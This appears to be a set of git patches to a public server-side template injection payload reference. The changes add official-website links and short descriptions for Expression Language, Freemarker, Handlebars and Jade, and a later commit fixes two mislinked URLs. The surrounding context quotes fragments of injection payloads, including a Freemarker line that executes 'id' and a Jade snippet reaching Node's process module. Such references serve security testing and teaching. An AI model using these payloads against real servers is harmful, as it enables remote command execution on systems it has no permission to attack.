ASP.NET Razor - Basic injection ```powershell @(1+2) @@ -91,6 +92,9 @@ https://docs.microsoft.com/en-us/aspnet/web-pages/overview/getting-started/intro ## Expression Language EL +[Official website](https://docs.oracle.com/javaee/6/tutorial/doc/gjddd.html) +> Expression Language (EL) is mechanism that simplifies the accessibility of the data stored in Java bean component and other object like request, session and application, etc. There are many operators in JSP that are used in EL like arithmetic and logical operators to perform an expression. It was introduced in JSP 2.0 + ### Expression Language EL - Basic injection ```java @@ -142,11 +146,14 @@ ${facesContext.getExternalContext().setResponseHeader("output","".getClass().for ## Freemarker +[Official website](https://freemarker.apache.org/) +> Apache FreeMarker™ is a template engine: a Java library to generate text output (HTML web pages, e-mails, configuration files, source code, etc.) based on templates and changing data. + You can try your payloads at [https://try.freemarker.apache.org](https://try.freemarker.apache.org) ### Freemarker - Basic injection -The template can be `${3*3}` or the legacy `#{3*3}` +The template can be `${3*3}` or the legacy `#{3*3}`. ### Freemarker - Code execution @@ -172,6 +179,9 @@ ${dwf.newInstance(ec,null)("id")} ## Handlebars +[Official website](https://github.com/HubSpot/jinjava) +> + ### Handlebars - Command Execution ```handlebars @@ -200,6 +210,9 @@ ${dwf.newInstance(ec,null)("id")} ## Jade / Codepen +[Official website](https://github.com/HubSpot/jinjava) +> + ```python - var x = root.process - x = x.mainModule.require From 25eae116755f0275cd3146a7e4bf9971adfcea65 Mon Sep 17 00:00:00 2001 From: Podalirius <79218792+p0dalirius@users.noreply.github.com> Date: Sun, 26 Sep 2021 21:57:50 +0200 Subject: [PATCH 6/6] Update README.md --- Server Side Template Injection/README.md | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md index add2466..66388e3 100644 --- a/Server Side Template Injection/README.md +++ b/Server Side Template Injection/README.md @@ -179,8 +179,8 @@ ${dwf.newInstance(ec,null)("id")} ## Handlebars -[Official website](https://github.com/HubSpot/jinjava) -> +[Official website](https://handlebarsjs.com/) +> Handlebars compiles templates into JavaScript functions. ### Handlebars - Command Execution @@ -210,7 +210,7 @@ ${dwf.newInstance(ec,null)("id")} ## Jade / Codepen -[Official website](https://github.com/HubSpot/jinjava) +[Official website](https://codepen.io/) > ```python